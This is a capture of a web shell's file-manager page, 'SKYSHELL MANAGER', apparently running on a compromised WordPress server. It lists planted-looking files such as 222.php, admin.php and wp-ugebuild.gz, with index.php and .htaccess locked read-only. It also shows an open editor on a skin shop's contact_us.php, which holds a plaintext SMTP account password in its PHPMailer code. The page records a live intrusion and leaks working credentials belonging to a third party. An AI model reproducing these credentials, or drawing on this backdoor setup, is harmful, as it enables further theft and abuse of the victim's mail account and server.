📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: contact_us.php
<!DOCTYPE html> <html lang="en"> <head> <title>Contact Us - Live Skin Shop</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Best treatment For different skin types"> <meta name="keywords" content="Skin shop,Best Skin shop"> <link rel="shortcut icon" href="images/favicon.png" type="image/x-icon"> <!-- <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />--> <link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/camera.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/style.css" type="text/css" media="screen"> <link href='http://fonts.googleapis.com/css?family=Parisienne|Raleway:400,300' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700' rel='stylesheet' type='text/css'> <script type="text/javascript" src="js/jquery.js"></script> <script type="text/javascript" src="js/superfish.js"></script> <script type="text/javascript" src="js/jquery.easing.1.3.js"></script> <script type="text/javascript" src="js/camera.js"></script> <script type="text/javascript" src="js/jquery.cookie.js"></script> <script type="text/javascript" src="js/jcarousel.js"></script> <script> jQuery(document).ready(function(){ // Responsive layout, resizing the items $('.carousel.main ul').carouFredSel({ auto: 4000, responsive: true, width: '100%', scroll: 1, prev: '#prev', next: '#next', pagination: false, mousewheel: false, swipe: { onMouse: true, onTouch: true }, items: { width:380, height: 'auto', // optionally resize item-height visible: { min: 2, max: 3 } } }); }); </script> <script type="text/javascript"> $(document).ready(function() { $("#ajax-contact-form").submit(function() { var str = $(this).serialize(); $.ajax( { type: "POST", url: "contact.php", data: str, success: function(msg) { if(msg == 'OK') // Message Sent? Show the 'Thank You' message and hide the form { result = '<div class="notification_ok">Your message has been sent. Thank you!<br> <a href="#" onclick="freset();return false;">send another mail</a></div>'; $("#fields").hide(); } else { result = msg; } $("#note").html(result); } }); return false; }); }); function freset() { $("#note").html(''); document.getElementById('ajax-contact-form').reset(); $("#fields").show(); } </script> <!--[if lt IE 8]> <div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/images/upgrade.jpg"border="0"alt=""/></a></div> <![endif]--> <!--[if (gt IE 9)|!(IE)]><!--> <script type="text/javascript" src="js/jquery.mobile.customized.min.js"></script> <!--<![endif]--> <!--[if lt IE 9]> <link href='http://fonts.googleapis.com/css?family=Open+Sans:400' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Open+Sans:600' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"> <![endif]--> </head> <body> <div id="main"> <!--<div class="container top"> <div class="row"> <div class="span12"> <div class="clearfix"> <div class="social"> <a href="#"><img src="images/social_1.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_2.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_3.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_4.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_5.png" alt="" width="29" height="30" border="0" /></a> </div> <!--==============================Search========================= <form id="search-form" action="search.php" method="GET" accept-charset="utf-8" class="navbar-form" > <input type="text" name="s" value='Search' onBlur="if(this.value=='') this.value='Search'" onFocus="if(this.value =='Search' ) this.value=''" > <a href="#" onClick="document.getElementById('search-form').submit()"></a> </form> </div> </div> </div> </div>--> <div id="inner"> <!--==============================Header=================================--> <header> <div class="container"> <div class="row"> <div class="span5"> <div class="clearfix"> <div class="clearfix header-block-pad"> <a href="index.php"><img src="images/logo.png" alt=""></a> </div> </div> </div> <div class="span7"> <p class="phone"> Have questons? <span>Call: +414-289-9997</span> </p> </div> </div> </div> <!--==============================Nav=================================--> <div id="nav_section"> <div class="container"> <div class="row"> <div class="span12"> <div class="navbar navbar_ clearfix"> <div class="navbar-inner navbar-inner_"> <div class="container"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse_">MENU</a> <div class="nav-collapse nav-collapse_ collapse"> <ul class="nav sf-menu"> <li class="active"> <a href="index.php"> Home </a> </li> <li class="sub-menu"> <a href="about.php"> About us </a> </li> <li> <a href="services.php"> Services </a> </li> <li > <a href="therapies.php"> Therapies </a> </li> <li> <a href="treatments.php"> Treatments </a> </li> <li > <a href="contact_us.php"> Contact Us </a> </li> </ul> </div> </div> </div> </div> </div> </div> </div> </div> <!--==============================End Nav=================================--> </header> <!--==============================Carusel=================================--> <div class="carousel-box"> <div class="inner span12"> <div class="carousel main" > <ul > <li > <a> <small>1</small> <h4>Skin Care</h4> <p> Healthy skin starts with a commitment to a regular skin care regimen, using high quality skin care and facial products every day. While we often think of the face first when it comes to caring for the skin, the skin on the body also needs attention. </p> </a> </li> <li > <a> <small>2</small> <h4>Make Up</h4> <p> Away from your everyday makeup favorites like foundations, lip color, blushes and eye shadows, our collection of cosmetics also includes eyelash and eyebrow enhancers, mineral concealers </p> </a> </li> <li > <a> <small>3</small> <h4>Hair Care</h4> <p> Even though we're best known for our skin care, we carry a variety of hair products including shampoos, conditioners, styling products, styling tools and special treatments. </p> </a> </li> <li > <a> <small>4</small> <h4>Bath & Body</h4> <p> Let our range of body products inspire you to pamper yourself from top to toe, whilst looking after your body. With our extensive range of skin loving products, from moisturizers and bath oil </p> </a> </li> </ul> <a id="prev" href="javascript:;" style="display: block;" class=""></a> <a id="next" href="javascript:;" style="display: block;" class=""></a> </div> </div> </div> <!--==============================Content=================================--> <section id="content" > <div class="container"> <div class="row "> <div class="clearfix "> <div class="span6"> <h2>Map</h2> <div class="map"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2915.404341515186!2d-87.8937658489094!3d43.05396279888711!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x880518e1793c45bf%3A0x64a6de53fc1c5a0c!2s1751+N+Farwell+Ave%2C+Milwaukee%2C+WI+53202%2C+USA!5e0!3m2!1sen!2sin!4v1557384371142!5m2!1sen!2sin" width="600" height="450" frameborder="0" style="border:0" allowfullscreen></iframe> </div> <div class="clearfix padcontent"></div> </div> <div class="span6"> <h2>Contact Address</h2> <div class="row"> <div class="span3"> <p> <strong>liveskinshop</strong> Steven Crowley, <br /> 1751 N Farwell Ave, <br /> Milwaukee, WI 53202, USA<br> Telephone: +414-289-9997 <br /> E-mail: <a href="contact_us.php">contact@liveskinshop.com</a> <div class="padcontent_small"></div> </p> </div> <!--<div class="span3"> <p> <strong>Companyname INC.</strong> 8901 Marmora Road, <br /> Glasgow, D04 89GR. <br /> Telephone: +1 800 123 1234 <br /> E-mail: <a href="#">mail@Companyname.com</a> </p> </div>--> </div> <div class="clearfix padcontent"></div> <h2>Contact Form</h2> <div id="note"></div> <div id="fields" class="contact-form"> <form class="form-horizontal" action="contact_us.php" method="POST" enctype="multipart/form-data"> <div class="control-group"> <label class="control-label" for="inputName">Full Name:</label> <input type="text" name="name" > </div> <div class="control-group"> <label class="control-label" for="inputEmail">Email:</label> <input type="text" name="email" > </div> <div class="control-group"> <label class="control-label" for="inputEmail">Message:</label> <textarea name="message" rows="3"></textarea> </div> <!--<div class="control-group captcha"> <label class="control-label " for="captcha">Captcha:</label> <input type="text" name="capthca" value="" style="float:left; width:65px"> <img src="captcha/captcha.php" style="margin:3px 15px 5px 0px; width:100px; height:35px; float:left"> <div style="clear:both"></div> </div> --> <div class="clearfix"></div> <div class="control-group"> <button type="submit" name="Submit" class="btn_ left submit"><i class="icon-envelope icon-white"></i> submit</button> </div> </form> <?php //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/liveskinshop/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@liveskinshop.com'; $mail->Password = '8xnT8CvTXvdjzWnk'; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@liveskinshop.com', 'Live Skin Shop'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@liveskinshop.com", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Live Skin Shop [Contact Replay]"; $mail->Body = "<p>This message confirms that you have successfully registered.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a contact form on (http://liveskinshop.com/)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: "; } else { echo "Success! check your email."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@liveskinshop.com'; $mail2->Password = '8xnT8CvTXvdjzWnk'; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@liveskinshop.com', 'Live Skin Shop'); $mail2->addAddress('contact@liveskinshop.com', 'Live Skin Shop'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div> <div class="padcontent"></div> </div> </div> </div> </div> </section> <!--============================== end of Content=================================--> <!-- {% Footer %} --> <div class="bg_center_footer"> <div class="container"> <div class="row"> <div class="span3 footer-logo"> </div> <div class="span9"> <ul> <li> <a href="privacy-policy.php"> Privacy Policy </a> </li> <li> <a href="termsandconditions.php"> Terms and Conditions </a> </li> <li> <a href="subscribe.php"> Subscribe </a> </li> <li> <a href="unsubscribe.php"> Unsubscribe </a> </li> </ul> </div> </div> </div> </div> <!-- {% Copyright %} --> <div class="copyright"> <div class="container"> <div class="row"> <div class="span12" style="text-align:center"> <a href="liveskinshop.com">Live Skin Shop</a> © 2019. All rights reserved. </div> </div> </div> </div> </div><!-- inner --> </div><!-- main --> <script type="text/javascript" src="js/bootstrap.js"></script> </body> </html>
Save